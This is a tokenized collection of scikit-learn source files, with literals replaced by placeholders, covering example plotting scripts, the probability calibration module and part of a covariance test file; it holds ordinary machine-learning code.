<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from sklearn . datasets import make_classification <EOL> from sklearn . ensemble import ExtraTreesClassifier <EOL> X , y = make_classification ( n_samples = <NUM_LIT:1000> , <EOL> n_features = <NUM_LIT:10> , <EOL> n_informative = <NUM_LIT:3> , <EOL> n_redundant = <NUM_LIT:0> , <EOL> n_repeated = <NUM_LIT:0> , <EOL> n_classes = <NUM_LIT:2> , <EOL> random_state = <NUM_LIT:0> , <EOL> shuffle = False ) <EOL> forest = ExtraTreesClassifier ( n_estimators = <NUM_LIT> , <EOL> random_state = <NUM_LIT:0> ) <EOL> forest . fit ( X , y ) <EOL> importances = forest . feature_importances_ <EOL> std = np . std ( [ tree . feature_importances_ for tree in forest . estimators_ ] , <EOL> axis = <NUM_LIT:0> ) <EOL> indices = np . argsort ( importances ) [ : : - <NUM_LIT:1> ] <EOL> print ( "<STR_LIT>" ) <EOL> for f in range ( X . shape [ <NUM_LIT:1> ] ) : <EOL> print ( "<STR_LIT>" % ( f + <NUM_LIT:1> , indices [ f ] , importances [ indices [ f ] ] ) ) <EOL> plt . figure ( ) <EOL> plt . title ( "<STR_LIT>" ) <EOL> plt . bar ( range ( X . shape [ <NUM_LIT:1> ] ) , importances [ indices ] , <EOL> color = "<STR_LIT:r>" , yerr = std [ indices ] , align = "<STR_LIT>" ) <EOL> plt . xticks ( range ( X . shape [ <NUM_LIT:1> ] ) , indices ) <EOL> plt . xlim ( [ - <NUM_LIT:1> , X . shape [ <NUM_LIT:1> ] ] ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> from matplotlib import pyplot as pl <EOL> from matplotlib import cm <EOL> from sklearn . gaussian_process import GaussianProcessClassifier <EOL> from sklearn . gaussian_process . kernels import DotProduct , ConstantKernel as C <EOL> lim = <NUM_LIT:8> <EOL> def g ( x ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT> - x [ : , <NUM_LIT:1> ] - <NUM_LIT> * x [ : , <NUM_LIT:0> ] ** <NUM_LIT> <EOL> X = np . array ( [ [ - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> y = np . array ( g ( X ) > <NUM_LIT:0> , dtype = int ) <EOL> kernel = C ( <NUM_LIT:0.1> , ( <NUM_LIT> , np . inf ) ) * DotProduct ( sigma_0 = <NUM_LIT:0.1> ) ** <NUM_LIT:2> <EOL> gp = GaussianProcessClassifier ( kernel = kernel ) <EOL> gp . fit ( X , y ) <EOL> print ( "<STR_LIT>" % gp . kernel_ ) <EOL> res = <NUM_LIT:50> <EOL> x1 , x2 = np . meshgrid ( np . linspace ( - lim , lim , res ) , <EOL> np . linspace ( - lim , lim , res ) ) <EOL> xx = np . vstack ( [ x1 . reshape ( x1 . size ) , x2 . reshape ( x2 . size ) ] ) . T <EOL> y_true = g ( xx ) <EOL> y_prob = gp . predict_proba ( xx ) [ : , <NUM_LIT:1> ] <EOL> y_true = y_true . reshape ( ( res , res ) ) <EOL> y_prob = y_prob . reshape ( ( res , res ) ) <EOL> fig = pl . figure ( <NUM_LIT:1> ) <EOL> ax = fig . gca ( ) <EOL> ax . axes . set_aspect ( '<STR_LIT>' ) <EOL> pl . xticks ( [ ] ) <EOL> pl . yticks ( [ ] ) <EOL> ax . set_xticklabels ( [ ] ) <EOL> ax . set_yticklabels ( [ ] ) <EOL> pl . xlabel ( '<STR_LIT>' ) <EOL> pl . ylabel ( '<STR_LIT>' ) <EOL> cax = pl . imshow ( y_prob , cmap = cm . gray_r , alpha = <NUM_LIT> , <EOL> extent = ( - lim , lim , - lim , lim ) ) <EOL> norm = pl . matplotlib . colors . 
Normalize ( vmin = <NUM_LIT:0.> , vmax = <NUM_LIT> ) <EOL> cb = pl . colorbar ( cax , ticks = [ <NUM_LIT:0.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.> ] , norm = norm ) <EOL> cb . set_label ( '<STR_LIT>' ) <EOL> pl . clim ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> pl . plot ( X [ y <= <NUM_LIT:0> , <NUM_LIT:0> ] , X [ y <= <NUM_LIT:0> , <NUM_LIT:1> ] , '<STR_LIT>' , markersize = <NUM_LIT:12> ) <EOL> pl . plot ( X [ y > <NUM_LIT:0> , <NUM_LIT:0> ] , X [ y > <NUM_LIT:0> , <NUM_LIT:1> ] , '<STR_LIT>' , markersize = <NUM_LIT:12> ) <EOL> cs = pl . contour ( x1 , x2 , y_true , [ <NUM_LIT:0.> ] , colors = '<STR_LIT:k>' , linestyles = '<STR_LIT>' ) <EOL> cs = pl . contour ( x1 , x2 , y_prob , [ <NUM_LIT> ] , colors = '<STR_LIT:b>' , <EOL> linestyles = '<STR_LIT>' ) <EOL> pl . clabel ( cs , fontsize = <NUM_LIT:11> ) <EOL> cs = pl . contour ( x1 , x2 , y_prob , [ <NUM_LIT:0.5> ] , colors = '<STR_LIT:k>' , <EOL> linestyles = '<STR_LIT>' ) <EOL> pl . clabel ( cs , fontsize = <NUM_LIT:11> ) <EOL> cs = pl . contour ( x1 , x2 , y_prob , [ <NUM_LIT> ] , colors = '<STR_LIT:r>' , <EOL> linestyles = '<STR_LIT>' ) <EOL> pl . clabel ( cs , fontsize = <NUM_LIT:11> ) <EOL> pl . show ( ) </s>
<s> """<STR_LIT>""" <EOL> from matplotlib import pyplot as plt <EOL> import numpy as np <EOL> from sklearn . linear_model import ( <EOL> LinearRegression , TheilSenRegressor , RANSACRegressor , HuberRegressor ) <EOL> from sklearn . metrics import mean_squared_error <EOL> from sklearn . preprocessing import PolynomialFeatures <EOL> from sklearn . pipeline import make_pipeline <EOL> np . random . seed ( <NUM_LIT> ) <EOL> X = np . random . normal ( size = <NUM_LIT> ) <EOL> y = np . sin ( X ) <EOL> X = X [ : , np . newaxis ] <EOL> X_test = np . random . normal ( size = <NUM_LIT:200> ) <EOL> y_test = np . sin ( X_test ) <EOL> X_test = X_test [ : , np . newaxis ] <EOL> y_errors = y . copy ( ) <EOL> y_errors [ : : <NUM_LIT:3> ] = <NUM_LIT:3> <EOL> X_errors = X . copy ( ) <EOL> X_errors [ : : <NUM_LIT:3> ] = <NUM_LIT:3> <EOL> y_errors_large = y . copy ( ) <EOL> y_errors_large [ : : <NUM_LIT:3> ] = <NUM_LIT:10> <EOL> X_errors_large = X . copy ( ) <EOL> X_errors_large [ : : <NUM_LIT:3> ] = <NUM_LIT:10> <EOL> estimators = [ ( '<STR_LIT>' , LinearRegression ( ) ) , <EOL> ( '<STR_LIT>' , TheilSenRegressor ( random_state = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , RANSACRegressor ( random_state = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , HuberRegressor ( ) ) ] <EOL> colors = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> linestyle = { '<STR_LIT>' : '<STR_LIT:->' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> lw = <NUM_LIT:3> <EOL> x_plot = np . linspace ( X . min ( ) , X . max ( ) ) <EOL> for title , this_X , this_y in [ <EOL> ( '<STR_LIT>' , X , y ) , <EOL> ( '<STR_LIT>' , X_errors , y ) , <EOL> ( '<STR_LIT>' , X , y_errors ) , <EOL> ( '<STR_LIT>' , X_errors_large , y ) , <EOL> ( '<STR_LIT>' , X , y_errors_large ) ] : <EOL> plt . figure ( figsize = ( <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> plt . 
plot ( this_X [ : , <NUM_LIT:0> ] , this_y , '<STR_LIT>' ) <EOL> for name , estimator in estimators : <EOL> model = make_pipeline ( PolynomialFeatures ( <NUM_LIT:3> ) , estimator ) <EOL> model . fit ( this_X , this_y ) <EOL> mse = mean_squared_error ( model . predict ( X_test ) , y_test ) <EOL> y_plot = model . predict ( x_plot [ : , np . newaxis ] ) <EOL> plt . plot ( x_plot , y_plot , color = colors [ name ] , linestyle = linestyle [ name ] , <EOL> linewidth = lw , label = '<STR_LIT>' % ( name , mse ) ) <EOL> legend_title = '<STR_LIT>' <EOL> legend = plt . legend ( loc = '<STR_LIT>' , frameon = False , title = legend_title , <EOL> prop = dict ( size = '<STR_LIT>' ) ) <EOL> plt . xlim ( - <NUM_LIT:4> , <NUM_LIT> ) <EOL> plt . ylim ( - <NUM_LIT:2> , <NUM_LIT> ) <EOL> plt . title ( title ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from sklearn . pipeline import Pipeline <EOL> from sklearn . preprocessing import PolynomialFeatures <EOL> from sklearn . linear_model import LinearRegression <EOL> from sklearn . model_selection import cross_val_score <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> n_samples = <NUM_LIT:30> <EOL> degrees = [ <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:15> ] <EOL> true_fun = lambda X : np . cos ( <NUM_LIT> * np . pi * X ) <EOL> X = np . sort ( np . random . rand ( n_samples ) ) <EOL> y = true_fun ( X ) + np . random . randn ( n_samples ) * <NUM_LIT:0.1> <EOL> plt . figure ( figsize = ( <NUM_LIT> , <NUM_LIT:5> ) ) <EOL> for i in range ( len ( degrees ) ) : <EOL> ax = plt . subplot ( <NUM_LIT:1> , len ( degrees ) , i + <NUM_LIT:1> ) <EOL> plt . setp ( ax , xticks = ( ) , yticks = ( ) ) <EOL> polynomial_features = PolynomialFeatures ( degree = degrees [ i ] , <EOL> include_bias = False ) <EOL> linear_regression = LinearRegression ( ) <EOL> pipeline = Pipeline ( [ ( "<STR_LIT>" , polynomial_features ) , <EOL> ( "<STR_LIT>" , linear_regression ) ] ) <EOL> pipeline . fit ( X [ : , np . newaxis ] , y ) <EOL> scores = cross_val_score ( pipeline , X [ : , np . newaxis ] , y , <EOL> scoring = "<STR_LIT>" , cv = <NUM_LIT:10> ) <EOL> X_test = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:100> ) <EOL> plt . plot ( X_test , pipeline . predict ( X_test [ : , np . newaxis ] ) , label = "<STR_LIT>" ) <EOL> plt . plot ( X_test , true_fun ( X_test ) , label = "<STR_LIT>" ) <EOL> plt . scatter ( X , y , label = "<STR_LIT>" ) <EOL> plt . xlabel ( "<STR_LIT:x>" ) <EOL> plt . ylabel ( "<STR_LIT:y>" ) <EOL> plt . xlim ( ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> plt . ylim ( ( - <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> plt . legend ( loc = "<STR_LIT>" ) <EOL> plt . title ( "<STR_LIT>" . format ( <EOL> degrees [ i ] , - scores . mean ( ) , scores . std ( ) ) ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> print ( __doc__ ) <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from sklearn import datasets <EOL> from sklearn import svm <EOL> from sklearn . semi_supervised import label_propagation <EOL> rng = np . random . RandomState ( <NUM_LIT:0> ) <EOL> iris = datasets . load_iris ( ) <EOL> X = iris . data [ : , : <NUM_LIT:2> ] <EOL> y = iris . target <EOL> h = <NUM_LIT> <EOL> y_30 = np . copy ( y ) <EOL> y_30 [ rng . rand ( len ( y ) ) < <NUM_LIT> ] = - <NUM_LIT:1> <EOL> y_50 = np . copy ( y ) <EOL> y_50 [ rng . rand ( len ( y ) ) < <NUM_LIT:0.5> ] = - <NUM_LIT:1> <EOL> ls30 = ( label_propagation . LabelSpreading ( ) . fit ( X , y_30 ) , <EOL> y_30 ) <EOL> ls50 = ( label_propagation . LabelSpreading ( ) . fit ( X , y_50 ) , <EOL> y_50 ) <EOL> ls100 = ( label_propagation . LabelSpreading ( ) . fit ( X , y ) , y ) <EOL> rbf_svc = ( svm . SVC ( kernel = '<STR_LIT>' ) . fit ( X , y ) , y ) <EOL> x_min , x_max = X [ : , <NUM_LIT:0> ] . min ( ) - <NUM_LIT:1> , X [ : , <NUM_LIT:0> ] . max ( ) + <NUM_LIT:1> <EOL> y_min , y_max = X [ : , <NUM_LIT:1> ] . min ( ) - <NUM_LIT:1> , X [ : , <NUM_LIT:1> ] . max ( ) + <NUM_LIT:1> <EOL> xx , yy = np . meshgrid ( np . arange ( x_min , x_max , h ) , <EOL> np . arange ( y_min , y_max , h ) ) <EOL> titles = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> color_map = { - <NUM_LIT:1> : ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) , <NUM_LIT:0> : ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) , <NUM_LIT:1> : ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , <NUM_LIT:2> : ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) } <EOL> for i , ( clf , y_train ) in enumerate ( ( ls30 , ls50 , ls100 , rbf_svc ) ) : <EOL> plt . subplot ( <NUM_LIT:2> , <NUM_LIT:2> , i + <NUM_LIT:1> ) <EOL> Z = clf . predict ( np . c_ [ xx . ravel ( ) , yy . ravel ( ) ] ) <EOL> Z = Z . reshape ( xx . shape ) <EOL> plt . contourf ( xx , yy , Z , cmap = plt . cm . Paired ) <EOL> plt . 
axis ( '<STR_LIT>' ) <EOL> colors = [ color_map [ y ] for y in y_train ] <EOL> plt . scatter ( X [ : , <NUM_LIT:0> ] , X [ : , <NUM_LIT:1> ] , c = colors , cmap = plt . cm . Paired ) <EOL> plt . title ( titles [ i ] ) <EOL> plt . text ( <NUM_LIT> , <NUM_LIT:0> , "<STR_LIT>" ) <EOL> plt . show ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import warnings <EOL> from math import log <EOL> import numpy as np <EOL> from scipy . optimize import fmin_bfgs <EOL> from . base import BaseEstimator , ClassifierMixin , RegressorMixin , clone <EOL> from . preprocessing import LabelBinarizer <EOL> from . utils import check_X_y , check_array , indexable , column_or_1d <EOL> from . utils . validation import check_is_fitted <EOL> from . utils . fixes import signature <EOL> from . isotonic import IsotonicRegression <EOL> from . svm import LinearSVC <EOL> from . model_selection import check_cv <EOL> from . metrics . classification import _check_binary_probabilistic_predictions <EOL> class CalibratedClassifierCV ( BaseEstimator , ClassifierMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , base_estimator = None , method = '<STR_LIT>' , cv = <NUM_LIT:3> ) : <EOL> self . base_estimator = base_estimator <EOL> self . method = method <EOL> self . cv = cv <EOL> def fit ( self , X , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> X , y = check_X_y ( X , y , accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> force_all_finite = False ) <EOL> X , y = indexable ( X , y ) <EOL> lb = LabelBinarizer ( ) . fit ( y ) <EOL> self . classes_ = lb . classes_ <EOL> n_folds = self . cv if isinstance ( self . cv , int ) else self . cv . n_folds if hasattr ( self . cv , "<STR_LIT>" ) else None <EOL> if n_folds and np . any ( [ np . sum ( y == class_ ) < n_folds for class_ in self . classes_ ] ) : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( n_folds , n_folds ) ) <EOL> self . calibrated_classifiers_ = [ ] <EOL> if self . base_estimator is None : <EOL> base_estimator = LinearSVC ( random_state = <NUM_LIT:0> ) <EOL> else : <EOL> base_estimator = self . base_estimator <EOL> if self . cv == "<STR_LIT>" : <EOL> calibrated_classifier = _CalibratedClassifier ( <EOL> base_estimator , method = self . 
method ) <EOL> if sample_weight is not None : <EOL> calibrated_classifier . fit ( X , y , sample_weight ) <EOL> else : <EOL> calibrated_classifier . fit ( X , y ) <EOL> self . calibrated_classifiers_ . append ( calibrated_classifier ) <EOL> else : <EOL> cv = check_cv ( self . cv , y , classifier = True ) <EOL> fit_parameters = signature ( base_estimator . fit ) . parameters <EOL> estimator_name = type ( base_estimator ) . __name__ <EOL> if ( sample_weight is not None <EOL> and "<STR_LIT>" not in fit_parameters ) : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % estimator_name ) <EOL> base_estimator_sample_weight = None <EOL> else : <EOL> base_estimator_sample_weight = sample_weight <EOL> for train , test in cv . split ( X , y ) : <EOL> this_estimator = clone ( base_estimator ) <EOL> if base_estimator_sample_weight is not None : <EOL> this_estimator . fit ( <EOL> X [ train ] , y [ train ] , <EOL> sample_weight = base_estimator_sample_weight [ train ] ) <EOL> else : <EOL> this_estimator . fit ( X [ train ] , y [ train ] ) <EOL> calibrated_classifier = _CalibratedClassifier ( <EOL> this_estimator , method = self . method ) <EOL> if sample_weight is not None : <EOL> calibrated_classifier . fit ( X [ test ] , y [ test ] , <EOL> sample_weight [ test ] ) <EOL> else : <EOL> calibrated_classifier . fit ( X [ test ] , y [ test ] ) <EOL> self . calibrated_classifiers_ . append ( calibrated_classifier ) <EOL> return self <EOL> def predict_proba ( self , X ) : <EOL> """<STR_LIT>""" <EOL> check_is_fitted ( self , [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> X = check_array ( X , accept_sparse = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> force_all_finite = False ) <EOL> mean_proba = np . zeros ( ( X . shape [ <NUM_LIT:0> ] , len ( self . classes_ ) ) ) <EOL> for calibrated_classifier in self . calibrated_classifiers_ : <EOL> proba = calibrated_classifier . predict_proba ( X ) <EOL> mean_proba += proba <EOL> mean_proba /= len ( self . 
calibrated_classifiers_ ) <EOL> return mean_proba <EOL> def predict ( self , X ) : <EOL> """<STR_LIT>""" <EOL> check_is_fitted ( self , [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> return self . classes_ [ np . argmax ( self . predict_proba ( X ) , axis = <NUM_LIT:1> ) ] <EOL> class _CalibratedClassifier ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , base_estimator , method = '<STR_LIT>' ) : <EOL> self . base_estimator = base_estimator <EOL> self . method = method <EOL> def _preproc ( self , X ) : <EOL> n_classes = len ( self . classes_ ) <EOL> if hasattr ( self . base_estimator , "<STR_LIT>" ) : <EOL> df = self . base_estimator . decision_function ( X ) <EOL> if df . ndim == <NUM_LIT:1> : <EOL> df = df [ : , np . newaxis ] <EOL> elif hasattr ( self . base_estimator , "<STR_LIT>" ) : <EOL> df = self . base_estimator . predict_proba ( X ) <EOL> if n_classes == <NUM_LIT:2> : <EOL> df = df [ : , <NUM_LIT:1> : ] <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> idx_pos_class = np . arange ( df . shape [ <NUM_LIT:1> ] ) <EOL> return df , idx_pos_class <EOL> def fit ( self , X , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> lb = LabelBinarizer ( ) <EOL> Y = lb . fit_transform ( y ) <EOL> self . classes_ = lb . classes_ <EOL> df , idx_pos_class = self . _preproc ( X ) <EOL> self . calibrators_ = [ ] <EOL> for k , this_df in zip ( idx_pos_class , df . T ) : <EOL> if self . method == '<STR_LIT>' : <EOL> calibrator = IsotonicRegression ( out_of_bounds = '<STR_LIT>' ) <EOL> elif self . method == '<STR_LIT>' : <EOL> calibrator = _SigmoidCalibration ( ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % self . method ) <EOL> calibrator . fit ( this_df , Y [ : , k ] , sample_weight ) <EOL> self . calibrators_ . append ( calibrator ) <EOL> return self <EOL> def predict_proba ( self , X ) : <EOL> """<STR_LIT>""" <EOL> n_classes = len ( self . classes_ ) <EOL> proba = np . zeros ( ( X . 
shape [ <NUM_LIT:0> ] , n_classes ) ) <EOL> df , idx_pos_class = self . _preproc ( X ) <EOL> for k , this_df , calibrator in zip ( idx_pos_class , df . T , self . calibrators_ ) : <EOL> if n_classes == <NUM_LIT:2> : <EOL> k += <NUM_LIT:1> <EOL> proba [ : , k ] = calibrator . predict ( this_df ) <EOL> if n_classes == <NUM_LIT:2> : <EOL> proba [ : , <NUM_LIT:0> ] = <NUM_LIT:1.> - proba [ : , <NUM_LIT:1> ] <EOL> else : <EOL> proba /= np . sum ( proba , axis = <NUM_LIT:1> ) [ : , np . newaxis ] <EOL> proba [ np . isnan ( proba ) ] = <NUM_LIT:1.> / n_classes <EOL> proba [ ( <NUM_LIT:1.0> < proba ) & ( proba <= <NUM_LIT:1.0> + <NUM_LIT> ) ] = <NUM_LIT:1.0> <EOL> return proba <EOL> def _sigmoid_calibration ( df , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> df = column_or_1d ( df ) <EOL> y = column_or_1d ( y ) <EOL> F = df <EOL> tiny = np . finfo ( np . float ) . tiny <EOL> prior0 = float ( np . sum ( y <= <NUM_LIT:0> ) ) <EOL> prior1 = y . shape [ <NUM_LIT:0> ] - prior0 <EOL> T = np . zeros ( y . shape ) <EOL> T [ y > <NUM_LIT:0> ] = ( prior1 + <NUM_LIT:1.> ) / ( prior1 + <NUM_LIT> ) <EOL> T [ y <= <NUM_LIT:0> ] = <NUM_LIT:1.> / ( prior0 + <NUM_LIT> ) <EOL> T1 = <NUM_LIT:1.> - T <EOL> def objective ( AB ) : <EOL> E = np . exp ( AB [ <NUM_LIT:0> ] * F + AB [ <NUM_LIT:1> ] ) <EOL> P = <NUM_LIT:1.> / ( <NUM_LIT:1.> + E ) <EOL> l = - ( T * np . log ( P + tiny ) + T1 * np . log ( <NUM_LIT:1.> - P + tiny ) ) <EOL> if sample_weight is not None : <EOL> return ( sample_weight * l ) . sum ( ) <EOL> else : <EOL> return l . sum ( ) <EOL> def grad ( AB ) : <EOL> E = np . exp ( AB [ <NUM_LIT:0> ] * F + AB [ <NUM_LIT:1> ] ) <EOL> P = <NUM_LIT:1.> / ( <NUM_LIT:1.> + E ) <EOL> TEP_minus_T1P = P * ( T * E - T1 ) <EOL> if sample_weight is not None : <EOL> TEP_minus_T1P *= sample_weight <EOL> dA = np . dot ( TEP_minus_T1P , F ) <EOL> dB = np . sum ( TEP_minus_T1P ) <EOL> return np . array ( [ dA , dB ] ) <EOL> AB0 = np . 
array ( [ <NUM_LIT:0.> , log ( ( prior0 + <NUM_LIT:1.> ) / ( prior1 + <NUM_LIT:1.> ) ) ] ) <EOL> AB_ = fmin_bfgs ( objective , AB0 , fprime = grad , disp = False ) <EOL> return AB_ [ <NUM_LIT:0> ] , AB_ [ <NUM_LIT:1> ] <EOL> class _SigmoidCalibration ( BaseEstimator , RegressorMixin ) : <EOL> """<STR_LIT>""" <EOL> def fit ( self , X , y , sample_weight = None ) : <EOL> """<STR_LIT>""" <EOL> X = column_or_1d ( X ) <EOL> y = column_or_1d ( y ) <EOL> X , y = indexable ( X , y ) <EOL> self . a_ , self . b_ = _sigmoid_calibration ( X , y , sample_weight ) <EOL> return self <EOL> def predict ( self , T ) : <EOL> """<STR_LIT>""" <EOL> T = column_or_1d ( T ) <EOL> return <NUM_LIT:1.> / ( <NUM_LIT:1.> + np . exp ( self . a_ * T + self . b_ ) ) <EOL> def calibration_curve ( y_true , y_prob , normalize = False , n_bins = <NUM_LIT:5> ) : <EOL> """<STR_LIT>""" <EOL> y_true = column_or_1d ( y_true ) <EOL> y_prob = column_or_1d ( y_prob ) <EOL> if normalize : <EOL> y_prob = ( y_prob - y_prob . min ( ) ) / ( y_prob . max ( ) - y_prob . min ( ) ) <EOL> elif y_prob . min ( ) < <NUM_LIT:0> or y_prob . max ( ) > <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> y_true = _check_binary_probabilistic_predictions ( y_true , y_prob ) <EOL> bins = np . linspace ( <NUM_LIT:0.> , <NUM_LIT:1.> + <NUM_LIT> , n_bins + <NUM_LIT:1> ) <EOL> binids = np . digitize ( y_prob , bins ) - <NUM_LIT:1> <EOL> bin_sums = np . bincount ( binids , weights = y_prob , minlength = len ( bins ) ) <EOL> bin_true = np . bincount ( binids , weights = y_true , minlength = len ( bins ) ) <EOL> bin_total = np . bincount ( binids , minlength = len ( bins ) ) <EOL> nonzero = bin_total != <NUM_LIT:0> <EOL> prob_true = ( bin_true [ nonzero ] / bin_total [ nonzero ] ) <EOL> prob_pred = ( bin_sums [ nonzero ] / bin_total [ nonzero ] ) <EOL> return prob_true , prob_pred </s>
<s> import numpy as np <EOL> from sklearn . utils . testing import assert_almost_equal <EOL> from sklearn . utils . testing import assert_array_almost_equal <EOL> from sklearn . utils . testing import assert_array_equal <EOL> from sklearn . utils . testing import assert_raises <EOL> from sklearn . utils . testing import assert_warns <EOL> from sklearn . utils . testing import assert_greater <EOL> from sklearn import datasets <EOL> from sklearn . covariance import empirical_covariance , EmpiricalCovariance , ShrunkCovariance , shrunk_covariance , LedoitWolf , ledoit_wolf , ledoit_wolf_shrinkage , OAS , oas <EOL> X = datasets . load_diabetes ( ) . data <EOL> X_1d = X [ : , <NUM_LIT:0> ] <EOL> n_samples , n_features = X . shape <EOL> def test_covariance ( ) : <EOL> cov = EmpiricalCovariance ( ) <EOL> cov . fit ( X ) <EOL> emp_cov = empirical_covariance ( X ) <EOL> assert_array_almost_equal ( emp_cov , cov . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( cov . error_norm ( emp_cov ) , <NUM_LIT:0> ) <EOL> assert_almost_equal ( <EOL> cov . error_norm ( emp_cov , norm = '<STR_LIT>' ) , <NUM_LIT:0> ) <EOL> assert_almost_equal ( <EOL> cov . error_norm ( emp_cov , norm = '<STR_LIT>' ) , <NUM_LIT:0> ) <EOL> assert_almost_equal ( <EOL> cov . error_norm ( emp_cov , scaling = False ) , <NUM_LIT:0> ) <EOL> assert_almost_equal ( <EOL> cov . error_norm ( emp_cov , squared = False ) , <NUM_LIT:0> ) <EOL> assert_raises ( NotImplementedError , <EOL> cov . error_norm , emp_cov , norm = '<STR_LIT:foo>' ) <EOL> mahal_dist = cov . mahalanobis ( X ) <EOL> assert_greater ( np . amin ( mahal_dist ) , <NUM_LIT:0> ) <EOL> X_1d = X [ : , <NUM_LIT:0> ] . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> cov = EmpiricalCovariance ( ) <EOL> cov . fit ( X_1d ) <EOL> assert_array_almost_equal ( empirical_covariance ( X_1d ) , cov . covariance_ , <NUM_LIT:4> ) <EOL> assert_almost_equal ( cov . 
error_norm ( empirical_covariance ( X_1d ) ) , <NUM_LIT:0> ) <EOL> assert_almost_equal ( <EOL> cov . error_norm ( empirical_covariance ( X_1d ) , norm = '<STR_LIT>' ) , <NUM_LIT:0> ) <EOL> X_1sample = np . arange ( <NUM_LIT:5> ) . reshape ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> cov = EmpiricalCovariance ( ) <EOL> assert_warns ( UserWarning , cov . fit , X_1sample ) <EOL> assert_array_almost_equal ( cov . covariance_ , <EOL> np . zeros ( shape = ( <NUM_LIT:5> , <NUM_LIT:5> ) , dtype = np . float64 ) ) <EOL> X_integer = np . asarray ( [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ) <EOL> result = np . asarray ( [ [ <NUM_LIT> , - <NUM_LIT> ] , [ - <NUM_LIT> , <NUM_LIT> ] ] ) <EOL> assert_array_almost_equal ( empirical_covariance ( X_integer ) , result ) <EOL> cov = EmpiricalCovariance ( assume_centered = True ) <EOL> cov . fit ( X ) <EOL> assert_array_equal ( cov . location_ , np . zeros ( X . shape [ <NUM_LIT:1> ] ) ) <EOL> def test_shrunk_covariance ( ) : <EOL> cov = ShrunkCovariance ( shrinkage = <NUM_LIT:0.5> ) <EOL> cov . fit ( X ) <EOL> assert_array_almost_equal ( <EOL> shrunk_covariance ( empirical_covariance ( X ) , shrinkage = <NUM_LIT:0.5> ) , <EOL> cov . covariance_ , <NUM_LIT:4> ) <EOL> cov = ShrunkCovariance ( ) <EOL> cov . fit ( X ) <EOL> assert_array_almost_equal ( <EOL> shrunk_covariance ( empirical_covariance ( X ) ) , cov . covariance_ , <NUM_LIT:4> ) <EOL> cov = ShrunkCovariance ( shrinkage = <NUM_LIT:0.> ) <EOL> cov . fit ( X ) <EOL> assert_array_almost_equal ( empirical_covariance ( X ) , cov . covariance_ , <NUM_LIT:4> ) <EOL> X_1d = X [ : , <NUM_LIT:0> ] . reshape ( ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> cov = ShrunkCovariance ( shrinkage = <NUM_LIT> ) <EOL> cov . fit ( X_1d ) <EOL> assert_array_almost_equal ( empirical_covariance ( X_1d ) , cov . covariance_ , <NUM_LIT:4> ) <EOL> cov = ShrunkCovariance ( shrinkage = <NUM_LIT:0.5> , store_precision = False ) <EOL> cov . fit ( X ) <EOL> assert ( cov . 
